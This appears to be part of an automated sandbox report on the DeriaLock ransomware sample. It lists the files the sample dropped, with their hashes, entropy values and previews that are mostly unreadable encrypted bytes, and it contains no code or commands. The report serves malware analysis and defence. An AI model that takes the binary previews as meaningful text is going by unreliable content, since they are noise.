                                                                                                                                                            Preview:..HMV3@.....HLx(Z........m...]=.,...<.L.(.W...N......u1.)..v.].9@;.%.4~..k....q..&..!...O.............../.....p.#vJu-/I...0s.0U...j.H....9..V..X..T.,0>D.v...N/r....V..;7.?kzy..u.uV...v/..vC.....O..GI.'.zG...I...%.t.......5.0N..Y.3...0.wU.,$.R>T=..-.../TL.n...?n!..0......i q.......y.?.F..W.c.r.i.....Y...B._t.&.A.q...)..i.nW.%..X...~x..j.?........4s...]..(N...{.....)....(..NC.*....-6m..o.5........ z.....*v.k..K...]~...\..@..(....6.Z.<!.+&".^.y...<...)wc3u...c..z.:$.Qc....:.`d...U ...{..UkhD...../.!`k;w............$....&..E....u..Q..bv!#.. .d..,....,.hK..s/".......Q..x..X.O.9.6Cp..l..{....e...0..E...Di.n..d.4.;.p,.by.3..n......s..{...s.....N....|.....9..G.5.c....3.6v..>(..........a..ux.....6.7..f......r.....x..h..`.y.*fu...p.s.y.......m..j..z...6.1o.s.z.2P.a..UA.1>G...+.....:%g.f........c...t8J....fS..L....7f.g...CJ.....<.y....N...d..Bg..0/-..]5.@3p.).O.V..S.Is../..d&.P...b|.*6...c.V..&.J.P.cl....2....W.p3PC...x...........j.....5
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.799931482987212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:LlOZmAf1dZH684wzYRkEOJ0kU+B4AqajO5XvTUGOiBJUHSo1+:vy1fHa+1uu5qaJGUSF
                                                                                                                                                            MD5:67B2C6CCDA8148648EC95B7968D8E08B
                                                                                                                                                            SHA1:258F0B9366CD8D977C2FC483871E2DDF78F9CFC1
                                                                                                                                                            SHA-256:A65824D0693FEE02E6D367BEE5E6D3B4764690E66A82CC30F43B9C9646D5EAF6
                                                                                                                                                            SHA-512:D2D649C216ABD9DB7DB2594201A2BFB85610FA4598ACE9BA32BACFD8AEDA15CAF35F993CE884F37919440C2D2C2F734C572D1B387FEAABB49357BFBBC316A374
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:#]..wg..,.o....*.......$....dL.4....c.;.]~...;.H..\.N..2....3.u}..)_...Nn..x.....I.W.dS.....g.hh...}.?G..:..H:.{._-5J.E.m.T.u&..Yx...'......Ap..I.C.{c..?;..*HQ..........`..2...F..]..7q..e4.......&!,~#.G...@W...^b..HC..>M|x;..... .......t...%.T..p.....UVc..C.t.E..V.M.t(....!.\...G.-!A^...>B.. .......c...4.../.)utC.N y...6..r.8.....=.l........X.......dDU.O....#...&R.oc.2.X..p...MYd.+.^BF...^.R.-.Cr....X1....A.C.......`...&.P2..3.bq}.x.....9..2^...qJ.<.5...}..)x.3.r...<.G.&^c!..-A .>b.....5.e...X....'cd.......UK.w....n..c....G......<##`,B.s.68....`...o..#..ME.Fn.:.ezO.V... ...eJ..:....F.?..+...Q}}.E..:.>...Y.....m..qE.q..*.EJ.L...<.7.}..'.g.;\g.9..*..X"...I........gk k.=.&1#M ..n.K.>...T.i..N.....0.q...P......B.....Pm... \.S...4......q......f.r.......@.._..-[....q>SJ...JQ..w...tw.2....(.B.,..r1~h.......G@.....0o..SZ..t./}.GZ"...|...C.K......[.f.?._S........R.Y....../)...;.......K4.m&..7..W.I8......+..j]O. ..K...'...a..Y..r.2D...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.822195503138703
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:UfBHfcYZCwpiE/5wrqJdq6GEU91Vj+Ab0d5YnnPSn:UfBVf7YqHqZ/b0d5wS
                                                                                                                                                            MD5:4C35D200910A8561A0C579BE8E976A8E
                                                                                                                                                            SHA1:4A89E395EE36308ACE5993EF1AF435DB47C34B89
                                                                                                                                                            SHA-256:0220A06F5D56C9CE7FB247EE7B0B4FBF34744079B8E1C9BF67D00EF32EE9532F
                                                                                                                                                            SHA-512:7711CFD197F4DAEC2F8E6474ACA97942AA124B3234DAC58997A99815BDAA21C62CD1055AC0398D71F35911A83764F767100A06E3FE86C91371C5930C1D30E11E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...38.e.,.=c&..X\U.G..{...X..>_.J[l.......bX......C..Y...u..j...6l*..}b.s...)0...<..VG.E|..a.;.....3.|C.....@....}.o._..L.R.6.19$....-..N..4"-.....N.gT..;9+.$8...tN.:.&...c..j.}.(....S-\..7...../...?II...ESg..J?.t. ...."..~z.M...=.+.GX.t#.......k..P^.I.....dd.t.r.Q.Rq.B.....V.r.>..e6.W.U2I..p..a.a.5.......z.....'...%.>4..S}6..S....d.'.6.Z.P.6q2....gF.P.,......8.MXI.l....W..J..w.a...?Vt......pD.#+..*.p......JD&...F4...T..\.-......K.O'.r.Q.FM..........hQa.A..g|x..9...[....U....L.4{..G....^.xS.s....6+..p.2h|.R.~........L.}X..(.1.....R8..L...3..v........,......T3...X0.<.=.(^U.(.}.&...!..nWN.....0...V..3.?Vo.6.u........G..<]..D...dX..M.e..|i<..7h:.....G...YO.|.......v...e........6..^?j7.4..O.0.....JkY.P..0..S.m..+Qd)K=..."]...W..........<.....3....).qN...en..Wu..8..C..T.b..@...6..Q..J0._..)....x.|/,..0.#.....f.]Ws-..=..K......>.]..[pQ...6w..HtW..P....r.J.M..U)....~.....+)@....~.....h...W.6....9....({.....|.........6.G../`.....S...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):416
                                                                                                                                                            Entropy (8bit):7.507484107545686
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6NJ+CtWaWk3U8YZScPOHNkx+n2xVncGg1X:AuiMrMhhtXJxWaWk3UNZSWkfgVn7cdJ
                                                                                                                                                            MD5:56544FF9A9A659E62E4FBACD214606F5
                                                                                                                                                            SHA1:CB2ED2140679A640E1AF0C81732A83CEB78F9BE7
                                                                                                                                                            SHA-256:4E80BF07432C5E6C9D9FF2112B6DD8D5705C4261B724F930F6D39A0692875D4D
                                                                                                                                                            SHA-512:F58960722EE499FE8CE5E6D67D12B21E79D63C632C08A83B742836DA9E832EA5D81DFC5BA06A4489E29B5AA83F57C1DF14699AEAF92DF74E6FE57C25E1C03B67
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@."a.d...M^.'.5.n_.*......0....$;.^. ..1..g._h...T.'...2..."..FA.B >*.....G......<m|.Zx.q.ya...D...J...J$......uD.....9.....kq.).....#...v4.8.I.w.........n.^....v..Je........).u.kz.0.q.....>...K.7.}n.i..SKt....E....;9.Hir..N.,o.qZ.u..E.?l
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.816818159419884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:PbWcE8EvUoPvJw5mABvPm4H0Zl7wIKSPVtpYszGFLsNKzi3CwD:PbWc8UoZ5ABG4w7wNShYftzi3CO
                                                                                                                                                            MD5:011164CFF051285431CC28AC1D4C6A71
                                                                                                                                                            SHA1:EAEC6DCB59EF0A1DB47B957E074FA43E1C11E6F3
                                                                                                                                                            SHA-256:54EA8D98CC763603898A6A0977A66A3D3318A0BDD495A9FAD5FFFE5DC6D2F211
                                                                                                                                                            SHA-512:4DE71EB7E939F1637CCE1FA6D27AC06B5E65EAE793D5D638F4B02E2903BD42BB7AAB035DAA997AA032729FE7E9CF02C036FCA931232263AA8B4B4BFF529DBBB5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.B......Z.u.@..|...1W>.:.{....0...hBy.F...J/....C@C^~.kq...~..F9...g.+"}k....h...L...k.Z%.........-...;....z...l.r..p........c...5....Q?.Am.M...O8s..o..h.z.c_+.. ^.....}..@..Ew....n...N...q....{G......t....)..LB..P..R.....{S..r69fS.|.:......c.>..>N.L$..d..t7d..H~.`!a..A..5e0..)^.I........yV.24\wP.M.+~...I...x}G.:.....'..*5.(.H..(.(."..T.u#..'w....WW...|.*..a...(...}H.am.9F.K.h 0*..]0..Nj.|_r.......mfm....{.V.X0.T...B...._\..7Ii..E..B.)..DD.]~2...U...h....3]/o....K.C.......$........D..<....<.j1g.3{.gz.J,.}9|:......8.q..."..kh.(....L'F>...$=...O..S]}...hK.....V&...o.Ns..{...;9.".Wm.<..r..-.S....QV..X.H..4.M.t.)A....02>...........iP.....w.t,...{0n...E.3=sd.@.v.Q..Oqc0s..UV..[...:.l..I.!...c.q..I......:....Q.q......z/.>...`7C..B.=..{.T...=..........4.......T...2..l8D....N.8.1.<R......G..J.`..]O....(.-......&. .g.N.X.a.{x.<.j)..V+...C.G.S:.m..e.$oE..4.....*..~$}....~..8.5#.......%@.qLN.<...va.7p.Q.....;..].......X9R97...C....].g.B..._...$..c.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.791589562107725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:prRnme8JoZ5jWXT6F71g4HD2L8m5YjmCVOTASzM:prth8MmT6ha4j4yzVazM
                                                                                                                                                            MD5:35FC51632D2DF9FD4470EC3B8186400B
                                                                                                                                                            SHA1:5390A167DA6AC915682E3B60ECE1AADC5906C5BA
                                                                                                                                                            SHA-256:F40FA29CC4FC5A773A9A7DC3912F24DA4EE5E223170B5D71D5C7A52EB32692CC
                                                                                                                                                            SHA-512:7E435C3D22BBFBEC36C9A106399E2C96A370E87DAB17A3AFB91646E512361F7907274CAA129325FE8B261FCE09408B8209A07650B3D50BAF101C9F7D57B782CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:W.-.E.~_.......5!..U.^.+..;.g.,.qu...]P....Y..X.;4..N..q....N7Me.H.A. .S...<5[...8...T'.k.....D...pz..;i.."pE.;=........C../...z........`].x.IV|.-..+..._.(.8y.7......y.S.q.w....k+..2...i..M #3vB..,.[i...,\el......&...QP+...u.6.).. ...G..F..E.M....n8...3.V4..;....(.y..I..w....c;...z...:Ppm...|...3.~_p.).a2J.e.. .Zp..c.A.../.}........*..o.~.t..[.....[...Q.tyR.i.Q.dN.5I...1.u.s.t..).Kh..&o.....*..7.GQ....$........E.].Da...gp..j.$!n....D.37...}..JT..........?Z1.v..J.i..(E..............7....~.7....6.`..z......|...X.fF2.... ...P...78.>.r{....t=..?t..`.c.........n...;..CD.Ef.....4.+.....Zs.`..}..9.9.H<z.M..?u:......^5...[....FA........_...jq..1... ..t..O.].t.N*.8......st..s..O..T..{...9b.Ym...8Q....G....}.....]7.........M..^c.F..$=...1U`B.P...Q.....".8...>,7.C.tn0..*..j...(.O....]./<.....[2+...o/...P{y,.(.b....4i...9y.C...m+).N*.....u...N.L..L.f(..i....N.x.T8..D..p)_...-kr&4g..2..o.....P...n.....*jy.........t|..a'E..=C..S...W.%...P.(....}.......w.+
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.791589562107725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:prRnme8JoZ5jWXT6F71g4HD2L8m5YjmCVOTASzM:prth8MmT6ha4j4yzVazM
                                                                                                                                                            MD5:35FC51632D2DF9FD4470EC3B8186400B
                                                                                                                                                            SHA1:5390A167DA6AC915682E3B60ECE1AADC5906C5BA
                                                                                                                                                            SHA-256:F40FA29CC4FC5A773A9A7DC3912F24DA4EE5E223170B5D71D5C7A52EB32692CC
                                                                                                                                                            SHA-512:7E435C3D22BBFBEC36C9A106399E2C96A370E87DAB17A3AFB91646E512361F7907274CAA129325FE8B261FCE09408B8209A07650B3D50BAF101C9F7D57B782CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:W.-.E.~_.......5!..U.^.+..;.g.,.qu...]P....Y..X.;4..N..q....N7Me.H.A. .S...<5[...8...T'.k.....D...pz..;i.."pE.;=........C../...z........`].x.IV|.-..+..._.(.8y.7......y.S.q.w....k+..2...i..M #3vB..,.[i...,\el......&...QP+...u.6.).. ...G..F..E.M....n8...3.V4..;....(.y..I..w....c;...z...:Ppm...|...3.~_p.).a2J.e.. .Zp..c.A.../.}........*..o.~.t..[.....[...Q.tyR.i.Q.dN.5I...1.u.s.t..).Kh..&o.....*..7.GQ....$........E.].Da...gp..j.$!n....D.37...}..JT..........?Z1.v..J.i..(E..............7....~.7....6.`..z......|...X.fF2.... ...P...78.>.r{....t=..?t..`.c.........n...;..CD.Ef.....4.+.....Zs.`..}..9.9.H<z.M..?u:......^5...[....FA........_...jq..1... ..t..O.].t.N*.8......st..s..O..T..{...9b.Ym...8Q....G....}.....]7.........M..^c.F..$=...1U`B.P...Q.....".8...>,7.C.tn0..*..j...(.O....]./<.....[2+...o/...P{y,.(.b....4i...9y.C...m+).N*.....u...N.L..L.f(..i....N.x.T8..D..p)_...-kr&4g..2..o.....P...n.....*jy.........t|..a'E..=C..S...W.%...P.(....}.......w.+
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8172519334375385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2xNxFXfuMwPHo3xGq6CRs7oCFFjoZJi+kh/gSbg6oB993kqQp:uxBGMAaxGGsTFyJ5E4SojUqQp
                                                                                                                                                            MD5:5D59990446C7E2BA1BF130D9BDC535B6
                                                                                                                                                            SHA1:E16AA0866D285DAB4B71371979B13EC13EF76CC0
                                                                                                                                                            SHA-256:05E00ECAECCF81478D78E4A9B4DE10C71068A5CF633C3D6746DD69B5A9166E87
                                                                                                                                                            SHA-512:9044F9A67F19871193D6726B6B13E4D35A80B6F5D50F278578B503B961905488AFC08C805503FBA4368F4E31DF62ED0FCC078CEE9F30C8742388B2CD568B02B7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...'1>..u.....J.(q.yC..o.9e.r.......rt&e.......Y&..T..k..b.O@. V.M.=F4....!1m*.:.....e.....V...u.$"$5./[MU...OWaB*....rY_.R.\...i.....`....M...`v..S.{..5.$i...L...g.{.W..Rw.j6Y.4>.-...b.y......Z.w........f.....E*.;.6.h.M.....S. Ru..UN.93....Kv.f.-.O.$ ~....i.C.9,..e........D.};...O.WVQ......i..WQA>CJ4 ...U.D.`B{..N..#.k^.+...=w7.Ve.6u..w.....GB..G...x....Hhu..p..i6...Bd......r-...Z....[^...-...h.k6.`....p|~...s.V....7DR..f2.;v..8|..'S....8.^.6.......U..:t1.%..T..G.rao..J`n....Gy^.....T.f.......k*.Y3H.,.V.d.gj.DH.G.`.q\.....NC..`f.n.[G.s..G.R.a... ...(Y.ut0..J...FJ....2......T./2|d.C.....he6. a.WA..[w:V...?...T.....I.:.I?q..d.^..T./.......r.O.SS.R.....c..px....]u ....Y......f......JM.>...=.....W].....;.........A.M.e.].f"O........O.j...f.....T.j.U..+T'.Q..F..N..l......%P?e.+..).1".Br4.......Z_....@.x.k.R7bc.........KN.=.6.7...V.r.._..V.n.....ynN..K1.[.P.`.m..};.V..m.2.....w.......e..~_....(..hU.~...Y.A.....8I;..'......oI.^....M.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.814676349691905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:QjagtmomMB9SwS/A46oDq/XQeuS9pXjWtSjME4z6EE5g:e0oUL6oDqBuUpGSjNevB
                                                                                                                                                            MD5:FD4729AB9266106AD1026886ADF8D1CD
                                                                                                                                                            SHA1:E36A301FA4F1C75FEE399AC96686678CC906BA35
                                                                                                                                                            SHA-256:DAF4D461825B5F1E36CD496C0B82E705E2159602AE7F8B3FBAC0E47FD7E9D0DB
                                                                                                                                                            SHA-512:67F54385D02241CB758CE23477A981ADD819D29EA8009DE630F163C8FF354634C98F7DE447EC6A6F3D8D9BD05DB26DCBCC2071BC8FCA93FB8093E427834ABFAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.l........@.-.4..GrmA.X.*.F&rX.).."..M.i......Q]...<....p...!L08'.D...;s.Zc..i.!"M.../k..x...HH...5....!.>H.........,..."k.`...T.Jz.b$2.....b..m(..bi...wS.,T....i......N...}k*v.......!.........x.......pF..4s..7....Y}..]....ye......-../.;....Z..2\...^..8..i......).........E.t...fbN..6..7K}'.6|..Ja.k#"rD/.......2.fI....C....2S0.......dG..fCo?..../!v^.Z..p.R..E.80..g7.m.j.........U ...t...O....mMt.h...G....jQ..-......M..M.G...#4.x.....'.&...4.uH...U..<......wy....r.......{M..........PM...91.......C.{.....7..H...........W.. ..l.(..7..E9...B.....])[&b.Mv..,.Z.m...~../..@3..?...R..u.....es......k.hn.23.|.h.Q !W.f.RE..\'.t..nD/..S...J7..;.. .[....Y..`.2................?..3..p..'F.b.._A..z...I..$...._.`..+&........,....J.<.I..K<.....i.6...H..r.....}r!.fj.E..U.....$....JW.|.....>Ur......B.VE...D..gh.7.w..?...)m..1....m..w=@....x...........`...X.I\3.`S..9...&_$.I.Q.Z..::.....$...k.fU+.[m..jG..?.....!.....i.6.<n..y&.v*4.......2..x+!..4.~i
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.814676349691905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:QjagtmomMB9SwS/A46oDq/XQeuS9pXjWtSjME4z6EE5g:e0oUL6oDqBuUpGSjNevB
                                                                                                                                                            MD5:FD4729AB9266106AD1026886ADF8D1CD
                                                                                                                                                            SHA1:E36A301FA4F1C75FEE399AC96686678CC906BA35
                                                                                                                                                            SHA-256:DAF4D461825B5F1E36CD496C0B82E705E2159602AE7F8B3FBAC0E47FD7E9D0DB
                                                                                                                                                            SHA-512:67F54385D02241CB758CE23477A981ADD819D29EA8009DE630F163C8FF354634C98F7DE447EC6A6F3D8D9BD05DB26DCBCC2071BC8FCA93FB8093E427834ABFAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.l........@.-.4..GrmA.X.*.F&rX.).."..M.i......Q]...<....p...!L08'.D...;s.Zc..i.!"M.../k..x...HH...5....!.>H.........,..."k.`...T.Jz.b$2.....b..m(..bi...wS.,T....i......N...}k*v.......!.........x.......pF..4s..7....Y}..]....ye......-../.;....Z..2\...^..8..i......).........E.t...fbN..6..7K}'.6|..Ja.k#"rD/.......2.fI....C....2S0.......dG..fCo?..../!v^.Z..p.R..E.80..g7.m.j.........U ...t...O....mMt.h...G....jQ..-......M..M.G...#4.x.....'.&...4.uH...U..<......wy....r.......{M..........PM...91.......C.{.....7..H...........W.. ..l.(..7..E9...B.....])[&b.Mv..,.Z.m...~../..@3..?...R..u.....es......k.hn.23.|.h.Q !W.f.RE..\'.t..nD/..S...J7..;.. .[....Y..`.2................?..3..p..'F.b.._A..z...I..$...._.`..+&........,....J.<.I..K<.....i.6...H..r.....}r!.fj.E..U.....$....JW.|.....>Ur......B.VE...D..gh.7.w..?...)m..1....m..w=@....x...........`...X.I\3.`S..9...&_$.I.Q.Z..::.....$...k.fU+.[m..jG..?.....!.....i.6.<n..y&.v*4.......2..x+!..4.~i
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.789357220919627
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:sqSrtWJMNWp3QVhzLoY7jMQaaJ7CvbJyKdG8:FjMUp3ahvF7jEKo0KdG8
                                                                                                                                                            MD5:9F88CC2263AD200D8A5632EC17CACA4F
                                                                                                                                                            SHA1:5CBA33A96216778274B7C25E4FA425326E10FC3A
                                                                                                                                                            SHA-256:A2945FD39FF7E733F7187EBE4B4F54F54DC6C692EB47EE8D07624FFEC19D43DB
                                                                                                                                                            SHA-512:ED33EBF48DA4D6A98A768C5D02DFC2299E5FFEF6A7FE739128038D86D23DFDCB5B7934B0AC3A6B0C0B576852FB402086B993FA94B728946CC79D1394D6354672
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:z;S..`N..K_l..].f....W.@Y.w.[.....w..n....{..x.Q..m.0....XDk......{-...0.....h.a5....Z7.oO..D...P,.$.".&.iA. Y.;#..8...B.a........~.o..z...@"?.M.*/.,..0}.v%...>b>Z1..~..J.....>;.>[,..{5p*..L)..^.8-K.B.F...GW..E.5.L.d.m2.Ul.q.^.q0.M.k.L..4.CT.Z@...2.f......5..H+..X..7J..Ew&'.....m:..R......x.`...3e..8m...9.5kj..1P]`....1.s.E.......B....,....)E?/..4._.m..Y... .zA..8....[.[.9C...p...'.ON...a)..S.....8....e...jS.....9 ..Mx.b.U..HM.qg`j.3......0.*.....v.,...m>K...u.>..o..n\......*UW.3.NZ..2....<..s.lA.O .....*..I.=`d.)....r`..`.2v..w..n.t,,....#....r4..zw.]up.Ri.D.?...3.:.3jE....2.E....#..I......A..0.S.....@W.....0..9S.....|8....O.k.8Pll.f.w.or.}E.C..p>.tCs.t-K.f.".u.R;>.h....0....Oi.....#C.H.\.........#E....\E,..\...x..../7....@.r.].1.c-..........dU...bw.S...qER.~.58...L..v...Ft..$.SV.C:+...<.P./.fcc%...LE..`.K&.1.+..CF..csE....-.+.y.cT.E...sv5..........._....E=D.....`.$L....F.r#y.\..*.)...Z.&y.W..E.N..{pp.2.._.O....yZ..r5..8._..N2E.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.815258717891135
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:764OpY+gT2HffRv7X/oo3bqJ3aqHiAE6wi0tmyL3WEDcJnl:7KpY+eOfRb/oUWa0iAERpy5l
                                                                                                                                                            MD5:13CC287D050B344A1686C6C25ECB41F7
                                                                                                                                                            SHA1:CDC21CA4975BA27713C954C320225AD080D4D664
                                                                                                                                                            SHA-256:6908890351887458E6827BAC7706A2C1DEB620E0DC8F8C7C8AFCD87E33C7CC1E
                                                                                                                                                            SHA-512:6DBA8777AC0041DC4115D9905645A99900D8E68EA9B485CFE7CE7077385A5D701C663A29009137C5EB89B526F5494AA9F76E06F2AFE508302B63C652813665BD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:2C.fIl.sY.X...W\...4iy.o....V.r#}?..4.Y.U......;|K.4.n<...A..Z.....3.3.j....(....!..=...s...f..y..fh..4<}.xf...Z.T.....B..p.(....=WX.9.orq.5..d.3....Ts..TS.......4c....>.a>......'......h.5A.I...$.]]..Xyn8..~..ABRy.).E7..,n..g.p?..tb..mh].-:..=zY.X..x...n[..kS]N:..".D'.c.\...g.....ex......o0wIM.....O*+#n...y..^j..&.U'....u!'.I...nv..'4.."..N..b.%O..?..R..= m.=..J..=..-.o...O(>.@....2m.;....i.iF.q)s...y..%'.\.rzB.2..(2..FrI....B.{..........ZiDx...r../..hf..C(B.h..f.....#.2-.. `.{..pph.....Y....X.v.V.FJ..~Ih.)....g|...#...[....a..S$......Gp.$S..6[c.4...K..?..f.\3..PN.......7...x.,z.=. ....A..(...........5..5.h>F\.6.5.....z\.sBa.E..(..%6J.Z..{.....(.{......?..HD...D.......L...|l.....C+S.+..".GEG....y..}.u..".......y2.,z.o.!v.=......dHQgN0.=U;........#./.yp..ml........l....x.....s.R:.~.C/.{.`F.w.S2.M.8....8Z'..!...1&=."..QG.!.o.....w`....?...h.p.....R..A"C.=W8..$..\dg.xO6BnB..>..$.....+:.*..l7..&....HAz..A..-...j....3."{.o....$..7
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.80355399891252
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:yO/K7rtMwVg0HmA7V2z2cItTftLtvvDbBoth1HBrwn/Fw+3ylCAdP:yj7rtMwSA5a4FLtjbB6h1hr0p2x
                                                                                                                                                            MD5:0571D63ED63E5B2FF1502A2B412F3F5C
                                                                                                                                                            SHA1:4D45740280553E8CC55A7E8226A820BABCF1D9D6
                                                                                                                                                            SHA-256:70237C4C54588ABA9573430553FD6AD94356A33BD4227B5BB88ACBD7C8360493
                                                                                                                                                            SHA-512:839202822920377A4173D0AC35B0D88C665E22957BCE28FB37C3C73199BC8DFDA6047AFE38A9088ABAA4B80978E4BB779C3F4554777E03A55B45EA1145F07606
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:{..).l...<.&S..C....;.xS..`-.u..|`.Va...TY..L.......j...8..t..q..-/.J....d.,cl.Iq..........J].2 ......`2.....=v..D...... ...h.....v..oI.O<?n......7.60.n..t......3K.......L,.;...)_O..x.tpH.~a./t....K...t.s-s....S.ld..a..S....f%..~.(..y.....o...K,.!.....fZ.x[..S..2d....Z....}|a. ..F..F?>l...V.....D.C.6..1...`. . s.9.....d...E.I.4....3......^Q.,-........K.......:.8(eI...E..vI.q...H.~`...?)Zl;N0.....*j.....3m.Gki.A...J..}...g.d.&D.....0_.D......}.pw...{.U.....Wz....`..uO.2"..:}....7L.*.).uh[.*...f.$........i..uT..........#[..z..],*...5..w..yx......F..I. ,z......x.5,.,+...Y......TG .'*.Ps.w?ti...M....iD-.Am.U....._.%)%x.D.c.#.z-a)F. ..{.D......n......X...&.o..q........nzPe.z~....`..nN..4..-.|..O..T;.o.._.h`/.`z.f.U4A.D..m.w.a &.M....pQ6....h_d.....*..Dg..B.J.....vhez..Q.#...c..\.'..O.m.H.).MI 2.2.<C..W.@..[Y.P3'!.....T. .../U;...C..,........?a7..F.3..@.4=...{.J..)5x2.....=...4.Zo9..P..KtG.).}..PA.B.+..C......Z/=....../A.....F.d.`..n...M...d..Y..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.822705773011793
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YOAgPL4mmyOwp4BtljXh/llJaKrhmI3daiX02tDJmw5oh0:YpgBOwWBtlrhllJag51JN
                                                                                                                                                            MD5:C4A6A75B991B4944F0EE7D6ABEC7CAD7
                                                                                                                                                            SHA1:4325AE1DFBF66D464A84CEF82F0DAC1AE23468E2
                                                                                                                                                            SHA-256:6A7A6C789D0A68DEF1D7188668A4670F6140F240B63BDB62D91B33EDC199616E
                                                                                                                                                            SHA-512:84FFEA2BADB7E5A50C06AD6C46D17641331EC9B52C014974020D2E34F201EB2BD9B4458B1F729A90D51D6F11830EB71DA90280C00379AB2DE2D4130C7368D273
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
